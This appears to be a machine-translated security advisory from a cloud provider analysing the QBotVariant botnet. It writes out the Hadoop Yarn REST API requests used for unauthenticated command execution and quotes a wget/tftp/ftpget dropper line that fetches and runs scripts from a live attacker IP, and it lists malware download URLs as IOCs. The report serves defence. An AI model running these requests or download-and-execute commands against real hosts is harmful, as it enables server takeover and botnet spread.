The Internet brings convenience to people at the same time, its open a large number of resources are also malicious users with convenience, more and more open malicious program source code to reduce the external attack, the difficulty of invasion, making the security problem more serious.
Ali Cloud security team monitored a BOT family in May this year, whose samples were rewritten from the open channel source code of the Internet and widely spread on the Internet, causing great harm. The cloud security team analyzed, clustering and traced this kind of samples, so we named it As QBotVariant.
QBotVariant has DDoS attacks, backdoors, downloaders and brute force cracking. Once it is hacked, it becomes a Trojan horse. It mainly spreads through unauthorized access vulnerability of Hadoop Yarn resource management system REST API and brute force cracking based on weak passwords. The BOT family, like Mirai, targets multiple versions of operating systems. Servers are not only compromised, but IOT devices such as CCTV monitoring and home routing are more vulnerable to attack and intrusion. Radware’s Pascal Geenens mentioned this type of sample in a recent blog post, New DemonBot Discovered, but the IP, sample, and other information he found is only one sample in this family. More than 30 download servers have been Discovered. QBotVariant’s varied IP and binary sample variants make it difficult to find and track.
On the cloud platform, the activity of QBotVariant we have detected is as follows, reaching thousands at the peak, and the activity has not decreased.
Below, we will analyze QBotVariant in detail from multiple perspectives, such as transmission mode, script analysis, sample analysis and traceability.
Mode of invasion and transmission
The QBotVariant family spreads in two ways: one is to use unauthorized access vulnerability of REST API of Hadoop Yarn resource management system for intrusion; the other is to use hard-coded weak passwords for SSH brute force cracking.
Hadoop is a distributed system framework developed by the Apache Foundation. It implements distributed processing using the MapReduce algorithm. Yarn is a Hadoop cluster resource management system. The Hadoop Yarn resource management system is improperly configured, enabling unauthorized access and malicious use by attackers. An attacker can execute arbitrary code through the REST API deployment task without authentication, ultimately taking full control of the server.
The problem is caused by the port that enables the following functions
Yarn. The resourcemanager. Webapp. Address, the default port 8088
Yarn. The resourcemanager. Webapp. HTTPS. The address, the default port 8090
By applying the new application, follow the instructions below
curl -v -X POST ‘http://ip:port/ws/v1/cluster/apps/new-application’
Then execute the following command to complete the invasion
curl -s -i -X POST -H ‘Accept:application/json’ -H ‘Content-Type:application/json’http://ip:port/ws/v1/cluster/apps -data-binary @example.json
The example.json file is shown below
{
“am-container-spec”:{
“commands”:{
“Command “:” Execute the command written here”
}
},
“application-id”:”application_xxxx_xxxxx”,
“application-name”:”test”,
“application-type”:”YARN”
}
Script analysis
We have traced back to the original version of QBotVariant, which supports the execution of wGET, TFTP, ftpget and other scripts. The scripts can be downloaded and executed from a remote download server
bash -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
Wget HTTP: / / http://185.244.25.153/bins.sh; chmod 777 bins.sh; sh bins.sh;
TFTP 185.244.25.153 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh;
TFTP -r tftp2.sh -g 185.244.25.153; chmod 777 tftp2.sh; sh tftp2.sh;
Ftpget -v -u anonymous -p anonymous -p 21 185.244.25.153 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh
The following is a rewritten download script intercepted by Ali Cloud security. It can be seen from the script that the author compiled different versions of the program, disguised by NTPD, SSHD, OpenSSH, etc., in order to be able to support IOT devices well. On the other hand, busyBox support is added to each command line, which makes this class of scripts well supported on IOT devices, providing an easy way to distribute QBotVaraint.
There are scripts for compiling multiple versions in the source code captured by Ali Cloud
QBotVariant supports version types and their corresponding binary names:
Supported Version types
Corresponding binary name
Supported Version types
Corresponding binary name
mips
ntpd
i586
ftp
mipsel
sshd
m68k
pftp
sh4
openssh
sparc
sh
x86_64
bash
armv4l
armv6l
tftp
armv5l
apache2
i686
wget
powerpc-440fp
telnetd
powerpc
cron
Sample analysis
Ali Cloud intercepted many batches of samples are relatively similar, are adapted to QBot. Some authors may cut some functions in order to simplify the samples or carry out soft counterattack. We randomly compare the two captured samples. The sample on the right of the figure cuts getRandomPublicIP function, which only realizes a few functions of QBot, with smaller files and more single functions.
However, most of the samples have realized their basic functions, and their properties of propagation and harmfulness have not changed. Some functions are shown in the figure
Order analysis
We have analyzed the remote control command, and its functions are shown in the figure below
It is worth paying attention to StartTheLelz function, which is mainly used for blasting randomly generated IP addresses. As shown in the figure, random IP is obtained through getRandomPublicIP function, hard-coded user name and password are stored in the structure, and then connected. The maximum blasting times are controlled by Max variable. Max is related to the number of entries in the file description table but cannot exceed 4096.
From the data area, we can see that the author has integrated several common user names and passwords for blasting
If the blasting succeeds, the following script will be executed in the blasted host to infect the host and continue to spread
In addition to the common DDoS attack methods, QBotVariant can also send spam data through sendJUNK or sendUDP. As shown in the makeRandomStr function that generates random strings, sending a large number of garbage packets can also cause network bandwidth congestion.
In order to maximize the value of intrusion, QBotVariant also provides the remote shell command execution function, which starts with “SH” and returns the command execution results to the remote controller through FDgets and sockprintf, as follows
Sample traceability/homology analysis
In the process of sample analysis, we found an interesting phenomenon. In order to avoid detection, samples have different instructions, so we selected several on-line methods of QBotVariant.
The first type of information is simple and returns information about the size side, CPU architecture, host purpose, and so on.
The second type of information is comprehensive, including the operating system, CPU architecture, host usage, port, host IP address and so on.
The third type of information, the simplest, returns only architectural information.
Fourth, return size side, schema information.
Fifth, the information is more comprehensive, including architecture information, large and small end, host IP, host purpose and other information.
Sixth, return host IP address, type, and version information.
Seventh, return architecture, host IP and other information.
When tracing the samples, we found that there were a large number of source codes and binary files of such samples on Pastebin, which existed for several months. Other IOT worms were also included in the author directory. At the same time, we found that several authors made changes to QBot, as shown in the picture of Pastebin and Github of one of the authors
QBot seems everybody know little at home, but because of the source code is simple, small, support a variety of architecture, the client has not been interrupted ever since 09 is active, is often used in remote control, such as DDoS client, in its intercepting IP, most of that in North America and Europe, but cloud platform to detect attacks from internal IP source, Domestic security personnel should be taken seriously.
Security hardening ● Cloud firewall
Enable the IPS interception mode and virtual patch function of the cloud firewall. The cloud firewall already supports the defense against such vulnerabilities and brute force cracking. Users can still defend against such vulnerabilities even if they do not repair them in time.
● Network access control
Use ECS/VPC security group to control the access source IP address of the affected service port. If the Hadoop environment provides services only for the Intranet, do not publish the Hadoop service port to the Internet.
● Update and Upgrade
If you use self-built Hadoop, update patches in a timely manner based on actual conditions. Hadoop versions earlier than 2.X provide security authentication and add the Kerberos authentication mechanism. It is recommended to enable Kerberos authentication or you can choose to use MaxCompute(over 8 years of “zero” security vulnerabilities) on the cloud or e-MapReduce services on the cloud.
Safety recommendations
● The cloud firewall supports defense against attacks against this vulnerability. You are advised to purchase a cloud firewall and enable detection.
● Through the security butler service, security reinforcement and optimization work under the guidance of Ali Cloud security experts, to avoid the system affected by vulnerabilities.
conclusion
QBotVariant uses unauthorized access vulnerability of REST API of Hadoop Yarn Resource management system and weak password blasting to penetrate. Once infected with this worm, it will not only occupy computing resources of hosts, consume bandwidth and traffic, but also cause data leakage and data loss.
Aliyun security reminds Internet users to pay attention to the configuration of third-party applications to prevent such unauthorized vulnerabilities, and strengthen the security awareness of user names and passwords to effectively protect their assets.
IOC
Partial MD5-file name
The file name
MD5
185.244.25.153
YSDKOP.arm4
cc9de0d789efc8636946b4b41f374dfc
YSDKOP.arm5
ac94604edfe7730ccf70d5cd75610d01
YSDKOP.arm6
dcb51c5abd234a41ee0439183f53fd2d
YSDKOP.arm7
2416380b2fe0c693fd7c26a91b4cb8ee
YSDKOP.i586
2f029723c778f15e8e825976c66e45cd
YSDKOP.i686
49ec48d3afdddb098fa2c857fc63c848
YSDKOP.m68k
7efef839902ca20431d58685d9075710
YSDKOP.mips
eab0810535b45fa1bf0f6243dafb0373
YSDKOP.mpsl
a2c4e09821be6a4594e88376b9c30b5d
YSDKOP.ppc
1fc61114722f301065cd9673025ce5e0
YSDKOP.sh4
38abc827e67ff53d0814979b435e2c40
YSDKOP.sparc
20a38aeeffba9f0f1635c7b4b78f3727
YSDKOP.x86
8fd97d622e69b69a3331ee5ed08e71b2
188.166.125.19
7e9c49b9e743bcf7b382fa000c27b49d
apache2
64394fb25494b0cadf6062a0516f7c1a
bash
75e7ce8c110bb132d3897b293d42116a
cron
e8dfae1fe29183548503dc0270878e52
ftp
0e765d00f0ee174e79c81c9db812e3a2
ntpd
2cb932dcb5db84dafa8cdc6b4afa52d0
openssh
606a3169f099b0f2423c63b4ed3f9414
pftp
6666ef216ce7434927338137760f4ab0
sh
cc2e82ffbc6d5053efade4849c13099f
sshd
00b0a6516986aca277d0148c7ddf38c4
tftp
38b075ee960d08e96b2e77205ec017de
wget
58c5e1bc66ac6b364639bce4b3f76c58
Part of the IP
178.128.194.222
178.128.7.76
103.214.111.122
130.185.250.199
194.182.80.200
138.197.74.100
198.199.84.119
104.248.165.108
178.128.46.254
159.65.227.17
206.189.196.216
80.211.109.66
194.48.152.114
159.89.114.171
178.128.43.104
185.244.25.153
209.97.159.10
46.36.37.121
46.29.164.242
46.17.47.250
158.69.60.239
195.181.223.138
80.211.39.186
188.166.125.19
104.248.112.122
212.237.26.71
178.128.239.252
104.248.212.127
104.248.63.168
Partial URL and occurrence time
URL
time
http://138.197.74.100/bins.sh
20180904
http://80.211.39.186/bins.sh
20180904
http://178.128.239.252/bins.sh
20180908
http://158.69.60.239/bins/boti586final
20180908
http://158.69.60.239/bins/botx86_64final
20180908
http://158.69.60.239/bins/boti686final
20180908
http://158.69.60.239/bins.sh
20180908
http://178.128.239.252/bins.sh
20180909
http://130.185.250.199/bins.sh
20180909
http://46.17.47.250/xm2bash
20180913
http://104.248.112.122/Kuso69/Akiru.x86
20180918
http://194.182.80.200/bins.sh
20180919
http://104.248.112.122/Kuso69/Akiru.x86
20180919
http://209.97.159.10/bins.sh
20181003
http://46.17.47.250/xm2wget
20181005
http://185.244.25.153/bins.sh
20181009
http://159.65.227.17/bins.sh
20181009
http://178.128.7.76/bins.sh
20181010
http://185.244.25.153/bins.sh
20181010
http://104.248.212.127/bins.sh
20181010
http://159.65.227.17/bins.sh
20181010
http://206.189.196.216/bins.sh
20181010
http://188.166.125.19/bins.sh
20181010
http://188.166.125.19/bins.sh
20181011
http://185.244.25.153/bins.sh
20181011
http://178.128.7.76/bins.sh
20181011
http://104.248.212.127/bins.sh
20181011
http://80.211.109.66/bins.sh
20181012
http://185.244.25.153/bins.sh
20181012
http://195.181.223.138/bins.sh
20181012
http://159.89.114.171/bins.sh
20181012
http://178.128.7.76/bins.sh
20181012
http://104.248.212.127/bins.sh
20181012
http://185.244.25.153/bins.sh
20181015
http://104.248.165.108/bins.sh
20181018
http://198.199.84.119/bins.sh
20181018
http://103.214.111.122/bins.sh
20181019
http://178.128.46.254/bins.sh
20181019
http://178.128.43.104/bins.sh
20181019
http://104.248.63.168/vvglma
20181021
http://178.128.194.222/bins.sh
20181026
http://178.128.194.222/bins.sh
20181027
http://178.128.194.222/bins.sh
20181028
http://46.29.164.242/bins.sh
20181031
http://194.48.152.114/bins.sh
20181101
http://46.36.37.121/weed.sh
20181103
The original link
This article is the original content of the cloud habitat community, shall not be reproduced without permission.